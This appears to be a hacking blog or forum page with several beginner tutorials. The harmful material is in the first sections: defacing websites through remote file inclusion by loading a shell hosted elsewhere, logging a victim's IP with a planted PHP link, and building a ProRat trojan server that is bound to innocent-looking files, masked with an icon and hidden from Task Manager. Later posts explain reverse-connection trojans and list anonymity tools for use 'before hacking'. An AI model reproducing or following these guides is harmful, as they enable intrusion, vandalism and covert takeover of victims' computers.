Deface via RFI

#Searching for Vuln. Sites
#Checking if they are Vuln.
#Defacing them Tongue


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Searching for Vuln. sites:

We can find Vuln.websites by using Google Dorks

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Checking if they are Vuln. :

Now after we searched for sites on Google, many sites will show but not all of them are Vuln.
so how can we check? Tongue

after opening the site check the link, for example it will be like:

http://www.tagert.com/index.php?page=ANYTHING

now to check the site we should replace "ANYTHING" with "http://www.google.com" Smile

so it will be like :

http://www.tagert.com/index.php?page=htt...google.com

IF Google home page showed up then the website is Vuln. for RFI,
IF not then fine another one Tongue




++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Defacing:

OK, now if we found a Vuln. website how to deface? o_O

well now open any website on any free host and upload your shell in .txt
and replace http://www.google.com to your shell link so for EXAMPLE it will be:
http://www.yourfreehost.com/shell.txt

http://www.tagert.com/index.php?page=htt...shell.txt?

[!]NOTE:- DO NOT FORGET THE '?' in the end of the URL Tongue Big Grin

Now your shell will show so Deface the site Tongue

Read More

Dark comet RAT TuT [PDf with Picture ] NooB friendly

Read More

How to hack an IP addess of a remote computer

What can you do with an IP address?
Well you can hack a computer using it's IP address.
You can find the location of the computer using its IP address.

Things required:
1)  PHP script to catch the IP.
2) .txt file to store the IP.
you can download them from here.

Procedure:
Step 1: First create an account in any free webhosting site.
          examples are www.110mb.com
                              www.drivehq.com
                              www.t35.com
                              www.my3gb.com
Step 2: Extract the IP finder script you have downloaded.
Step 3: Now Upload the files onto the free web hosting site.
Step 4:Give the link of ip.php script to your friend.

When he clicks the link, his IP address will be strored in the ip_log.txt file.

DEMONSTRATION:

Here i have uploaded my scripts on to www.my3gb.com

and i clicked the ip.php link.
Now my IP address is stored in the ip_log.txt file

You can check out this with www.showmyip.com

Finding the location of the computer:
Now pick the IP address you got from the victim and open www.ip2location.com
here enter the IP address in the box and click "find location".
Thats it..

Read More

ProRAT [Trojan ] [TuT]

Hi guys..today i am going to show you how to set up ProRat and how to hack a computer using it. Well, i am going to finish up RAT setup articles with this. I will give the counter measures in my next article. As i haven’t written any articles on direct connection Trojans, I decided to write the one on PRORAT.

procedure to setup ProRat

STEP 1. First of all Download ProRat from here. Once it is downloaded extract it. A password prompt will come up. Enter the password.The password  "pro".

STEP 2. Open up the program and You should see the following window.

STEP 3. Click on the "Create" button in the bottom. Choose "Create ProRat Server".

STEP 4. Next put your IP address so the server could connect to you. You need not enter your IP address manually, you can do this by just clicking on the little arrow. it automatically fills your IP address.
Next put in your e-mail so that when and if a victim gets infected it will send you an email.

STEP 5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager. Just follow the steps as shown in the figure.

STEP  6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. You can select an image, text file or pdf file, So as to make the victim trust your file.

STEP  7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate.    I prefer using .exe files.

STEP  8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is.

STEP  9. After this, press Create server, your server will be in the same folder as ProRat. Start giving this file to your victim. When the victim double click the file, his computer will be in your control.

STEP  10. Now the hacker has lot of options to choose from. He can do many funny things with the victim’s computer.

NOTE: In this tutorial, i put the victim’s IP as 127.0.0.1 as i am testing it on my computer. Inorder to hack a remote computer, you need to get the IP address of your victim. If you dont  know how to find an IP address, you can read my article on finding out remote IP address from here

Read More

Kali Linux Installation [virtual Machine]

Kali Linux:

A famous PenTest OS for hackers

Download Kali linux
Download Virtual Box

Read More

ProXPN [installation]

ProXPN helps to upgrades your internet connection with VPN encryption secures all types of connections from DSL and cable to 3G gives you 100% private access to the internet get an IP address in the USA, UK, or NL.

It Protects websites you visit, hijack your passwords, credit cards, or banking details intercept and spy on your email, IMs, calls, or anything else, record your web, history, run traces to find out where you live.

Download 

Video tutorial 

Read More

TOR installation -[high anonymity]

Tor is very useful for online anonymity, its protect your privacy, defend against a form of network traffic analysis. Traffic analysis can be used to infer who is talking to whom over a public network. Knowing the source and destination of your Internet traffic allows others to track your behavior and interests.

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. 

Tor to keep websites from tracking them and their family members, or to connect to news sites, instant messaging services, or the like when these are blocked by their local Internet providers. Tor's hidden services let users publish web sites and other services without needing to reveal the location of the site.

Download 

Video Tutorial 

Read More

Staying Anonymous

Introduction

Now, I will demonstrate various ways on how to remain anonymous on the Internet. Privacy is a must, in today's world. Currently, there are a lot of crimes going on, such as Swatting, Doxing etc. When our identity gets leaked, it is a big loss for us and it is somewhat one of the big mistakes of our lives. Which is why, staying secure, and anonymous online is essential.

This tutorial is about two types of protection.

Online Protection

Offline Protection

---

First, we should get some offline protection. There are many ways on protecting ourselves. Remember, you should always have offline protection before hacking.

Pro Tip : Never trust anyone on the Internet. There are a lot of bots and individuals that add us on IM services for the sole purpose of infecting us.

---

Offline Protection

Note : In this part, offline protection refers to protecting your computer from viruses, Trojans, root kits, etc. It may also refer to encryption, such as File Encryption, OS protection, and such. It is very important to protect your files because we can't always trust the ways of Online Anonymity. If it goes wrong, our offline protection should save us. Trojans and viruses remain a great challenge to our Anonymity. There are always Trojans around and if we get infected, the attacker may use our machine as a proxy, and has full control on our machines.

---

Protect yourself from Malware

Malwarebytes' Anti-Malware

Malwarebytes' Anti-Malware (MBAM) is a computer application that finds and removes malware. Made by Malwarebytes Corporation

More and download

---

Encrypt your Keystrokes using KeyScrambler

KeyScrambler

KeyScrambler is an anti-keylogging program designed specifically to strengthen your PC security.

More and download

---

Get a Firewall

COMODO firewall

It is always recommended to use a Firewall when doing hacking. I recommend Comodo Firewall. COMODO firewall is Award-Winning personal firewall software on Internet.

Download here

---

Protect your files and OS using True Crypt.

TrueCrypt

TrueCrypt is a free open-source disk encryption software for Windows 7/Vista/XP, Mac OS X, and Linux.

Source and more: http://www.truecrypt.org/

Download here

---

Use Virtual Machines for hacking (VMWare Player)

VMWare Player

It is always a good idea on hacking from a VM (Virtual Machine) because if anything goes wrong just delete it using a good file eraser.

Source and more : https://www.vmware.com/products/desktop_...rview.html

Download Here

---

Deepfreeze your PC to prevent common attacks

DeepFreeze

Faronics Deep Freeze makes your PC indestructible. It protects your computer by freezing its original configuration, which prevents unwelcome or unwanted changes made while in-session from sticking. With a simple restore-to-reboot, your system integrity is maintained helping your machines to run smoothly and efficiently giving you more up-time and boosting user productivity.

Source and more : http://www.faronics.com/en-uk/enterprise...e_en-uk-2/

Download Here

---

Spoof your Mac Address using TMAC

TMAC

Technitium MAC Address Changer allows you to change (spoof) Media Access Control (MAC) Address of your Network Interface Card (NIC) irrespective to your NIC manufacturer or its driver. It has a very simple user interface and provides ample information regarding each NIC in the machine.

Source and more : http://www.technitium.com/tmac/index.html

Download here

---

Use CCleaner, the multi-purpose tool

CCleaner

Cleaner is a multi-purpose tool which can be used for deleting files, clearing temp files, cache, etc.

Source and more : http://www.piriform.com/ccleaner/

Download here

---

Clear the evil cookies

Flash Cookie Remover

Flash cookies are evil because they persist even if you delete your browser's cookies. They are stored separately from normal site cookies and therefore need a special tool to delete them.

Source and more : http://www.trojanhunter.com/flash-cookie-remover/

Download here

---

Other tips : Don't think that using Linux or Mac can't get you viruses. There are also malware that works on this Operating Systems. Malware programmers don't feel the need to write malware for this OSs since they are not used by many people.

---

Online Protection

Now we are moving to Online Protection. As you know, this is very important also more than Offline Protection. Common methods of Online protection are discussed below.

---

Types of Online Protection

VPN(s)

Proxies

Tor

SSH Tunneling

---

VPN (Virtual Private Network)

A virtual private network (VPN) is a network that uses primarily public telecommunication infrastructure, such as the Internet, to provide remote offices or traveling users access to a central organizational network.

VPN provides us a secure way of connecting to websites by hiding our IP and encrypting our information.

Source and more : http://en.wikipedia.org/wiki/Virtual_private_network

---

Free VPNs

Cyberghost

HotSpot Shield

Pro XPN

Open VPN

---

Paid VPNs

nVPN

SwissVPN

---

HTTP Proxies and SOCKS5

Get Proxy lists from this sites.

Alive Proxy

Hide My Ass

Proxy list

More here.

Pro-Tip : Don't use HideMyAss for hacking.

You can also get Proxies from HF, here.

---

For Premium and Private SOCKS5, you can search Google. Because the sites I use get down constantly.

---

Some Proxy sites

http://www.ninjacloak.com
http://www.hidemyass.com
http://go-between.me
http://ir2.me
http://rapidsurf.info
http://go-between.me
http://ir2.me
http://rapidsurf.info
http://yourownproxy.info
http://proxy.co.cc
http://iknownothing.org
http://accessyouth.info
http://buwk.com
http://UnblockFree.net
http://hillofbeans.biz
http://aptunnel.com
http://goaheadmakemyday.org
http://lameproxy.info
http://centerfoldproxy.info
http://proxylist.co
http://sneaky9.com
http://freesurfproxy.com
http://goflyakite.org
http://fastieproxy.com
http://ihaveacunningplan.info
http://schoolfreezone.com
http://proxify.net
http://passmethru.com
http://proxy2use.com
http://0001.cz.cc

---

Use Tor for secure browsing

Tor

Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis

Source and more : https://www.torproject.org/about/overview.html.en

---

SSH Tunneling

Things you will need for SSH Tunneling

PuTTy

Firefox (Preferred)

Steps of Tunneling

Open PuTTY

Enter your IP on the Hostname or IP Address text box

To find your IP, you can use Command Prompt. Just type ipconfig and click Enter.

Now to the left of PuTTy, you will see a list.

Click the '+' symbol of SSH.

From the drop down, click Tunnels

You need to input a port and the click "Dynamic".

Now click Add and open the connection. You will be connected.

Now in your browser proxy settings, type 127.0.0.1 for IP and the selected port for port.

That's it. It is done!!

---

Conclusion

It is a proven fact that nobody can be fully anonymous on the Internet. However, that does not mean nobody is secure. We should take steps to protect ourselves in the World Wide Web. Daily, a large amount of Cyber Crimes occurs and Identity theft is one of them. Black Hats ruin peoples' lives for personal gain. It is our duty to remain secure. I sincerely hope this guide helped you.

Regards,

Read More

Free VPN - No Logs - No Bandwidth Limits - No Restrictions

Well the title says it all, Free VPN.

If you have just started hacking, you would of been recommended to get a VPN and well obviously some of the VPN on the market are either expensive or keep logs. If you are Interesting in getting a free VPN I would recommend reading my tutorial below.

Step 1 - Go to http://www.vpnbook.com/#home

Step 2 - Click on "accounts free" (as shown below)

Step 3 - Click on "UDP" port "53" ( the link is http://www.vpnbook.com/free-openvpn-acco...-udp53.zip ) after you have downloaded the .zip, downloaded the "OpenVPN client" ( http://swupdate.openvpn.org/community/re...stall.exe) and install it.


Step 4 - Now regarding the .zip you show extract the two files onto your desktop and then drag and drop the two files to C:\Program Files (x86)\OpenVPN\config

Step 5 - Now open the OpenVPN.exe and you should see a screen like below;

Step 6 - Now go back to http://www.vpnbook.com/#pricing and copy the username and password. 

and paste them In the openVPN


Step 7 - Finished.

Read More

Trojans and RATs- Know The Facts

What are TROJANS?

A Trojan is a program that pretends to be legitimate program, while It is malicious in nature and is infecting the system in background. It  provides complete access of that system to the Attacker.

How Trojans work?

Trojans work on client server basis.  The client will reside on hacker’s system and the server will be on victim’s computer. When the victim clicks the server, client listens to the connections through the specified ports and gives the access to the victim’s system.

Ports

Ports are the end points that provide communication between computers or networking devices.

Physical ports- example usb ports,serial port etc

Virtual ports- Virtual ports provide a virtual connection between the computer systems. These ports are the ones we need for communication on internet. Different Trojans use different ports.  These are referenced using some numbers. There are  65535 ports.

Direct connection Trojans

If the Trojan is direct connecting Trojan then attacker can connect to the victim directly and can get access to the victim machine, but the scenario is not always that easy. Victim can be behind a router, in that case direct connection Trojans will not any provide any access to the victim computer. One more disadvantage is we need to know the IP address of the victim.

HACKER-->server-->VICTIM

Example: PRORAT

Reverse connection Trojans

When the  Victim is behind a router, direct connection Trojans will not  provide any access to the victim computer. Here comes the need of reverse connection Trojans. In this case, the victim will be connected to the hacker using the server file. This is Very useful if the person sits behind a router . After infecting the victims PC, the trojan will automaticly connects to the hacker.

HACKER<--Server<--VICTIM

Example: Darkcomet

Port forwarding

If the hacker does not connect to the Internet directly (with a modem) and he sits behind a router, he needs to forward the trojan ports in his routers configuration if he is doing a reverse connection. This is called portforwarding.  The basic idea of port forwarding is to instruct our router to allow external connections to our PC. It varies from router to router based on its company and version.

Dynamic IP address

Most of the computers today do not have a static IP address, So  using a service like no-ip which gives you a name like hacker.no-ip.org  which can be pinged from anywhere on the internet and it will give your current IP address. Set your reverse connection trojans to connect to this name.

Read More